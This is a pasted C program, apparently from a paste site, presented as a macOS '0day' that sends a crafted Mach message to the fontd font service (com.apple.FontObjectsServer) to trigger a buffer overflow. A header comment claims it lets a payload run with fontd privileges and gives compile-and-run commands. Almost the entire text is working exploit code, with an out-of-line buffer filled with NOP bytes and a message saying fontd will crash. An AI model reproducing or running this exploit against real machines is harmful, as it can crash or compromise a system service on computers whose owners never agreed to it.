SHOW:
|
|
- or go back to the newest paste.
| 1 | /* | |
| 2 | OS X 0day - works on latest version as of 4/30/15 | |
| 3 | BO exploitation @ fontd, allows payload to run code with fontd privileges. | |
| 4 | gcc getrekt.c -o getrekt; chmod 777 *; ./getrekt | |
| 5 | */ | |
| 6 | ||
| 7 | #include <stdio.h> | |
| 8 | #include <stdlib.h> | |
| 9 | #include <mach/mach.h> | |
| 10 | #include <servers/bootstrap.h> | |
| 11 | ||
| 12 | #define SERVICE_NAME "com.apple.FontObjectsServer" | |
| 13 | #define DEFAULT_MSG_ID 46 | |
| 14 | ||
| 15 | #define EXIT_ON_MACH_ERROR(msg, retval, success_retval) if (kr != success_retval) { mach_error(msg ":" , kr); exit((retval)); }
| |
| 16 | ||
| 17 | typedef struct {
| |
| 18 | mach_msg_header_t header; | |
| 19 | mach_msg_size_t descriptor_count; | |
| 20 | mach_msg_ool_descriptor64_t desc; | |
| 21 | } msg_format_send_t; | |
| 22 | typedef struct {
| |
| 23 | u_int32_t int1; | |
| 24 | u_int32_t int2; | |
| 25 | u_int32_t size_data; | |
| 26 | char data[512]; | |
| 27 | } hi_msg; | |
| 28 | ||
| 29 | int main(int argc, char **argv) {
| |
| 30 | kern_return_t kr; | |
| 31 | msg_format_send_t send_msg; | |
| 32 | mach_msg_header_t *send_hdr; | |
| 33 | mach_port_t server_port; | |
| 34 | vm_address_t hi_addr = 0; | |
| 35 | hi_msg *hello; | |
| 36 | ||
| 37 | kr = bootstrap_look_up(bootstrap_port, SERVICE_NAME, &server_port); | |
| 38 | EXIT_ON_MACH_ERROR("bootstrap_look_up", kr, BOOTSTRAP_SUCCESS);
| |
| 39 | ||
| 40 | vm_allocate(mach_task_self(), &hi_addr, sizeof(hi_msg), VM_FLAGS_ANYWHERE); | |
| 41 | hello = (hi_msg *)hi_addr; | |
| 42 | ||
| 43 | send_hdr = &(send_msg.header); | |
| 44 | send_hdr->msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MOVE_SEND,0) | MACH_MSGH_BITS_COMPLEX; | |
| 45 | send_hdr->msgh_size = sizeof(send_msg); | |
| 46 | send_hdr->msgh_remote_port = server_port; | |
| 47 | send_hdr->msgh_local_port = MACH_PORT_NULL; | |
| 48 | send_hdr->msgh_id = DEFAULT_MSG_ID; | |
| 49 | send_msg.descriptor_count = 1; | |
| 50 | send_msg.desc.address = (uint64_t)hello; | |
| 51 | send_msg.desc.size = sizeof(hi_msg); | |
| 52 | send_msg.desc.type = MACH_MSG_OOL_DESCRIPTOR; | |
| 53 | printf("Sending... fontd will crash now.\n");
| |
| 54 | hello->int1 = __builtin_bswap32(0x16); | |
| 55 | hello->int2 = __builtin_bswap32(0x01); | |
| 56 | hello->size_data = __builtin_bswap32(sizeof(hello->data)); | |
| 57 | memset(hello->data, 0x90, sizeof(hello->data)); | |
| 58 | ||
| 59 | // send request | |
| 60 | kr = mach_msg(send_hdr, // message buffer | |
| 61 | MACH_SEND_MSG, // option indicating send | |
| 62 | send_hdr->msgh_size, // size of header + body | |
| 63 | 0, // receive limit | |
| 64 | MACH_PORT_NULL, // receive name | |
| 65 | MACH_MSG_TIMEOUT_NONE, // no timeout, wait forever | |
| 66 | MACH_PORT_NULL); // no notification port | |
| 67 | EXIT_ON_MACH_ERROR("mach_msg(send)", kr, MACH_MSG_SUCCESS);
| |
| 68 | ||
| 69 | printf("Exiting\n");
| |
| 70 | exit(0); | |
| 71 | } |
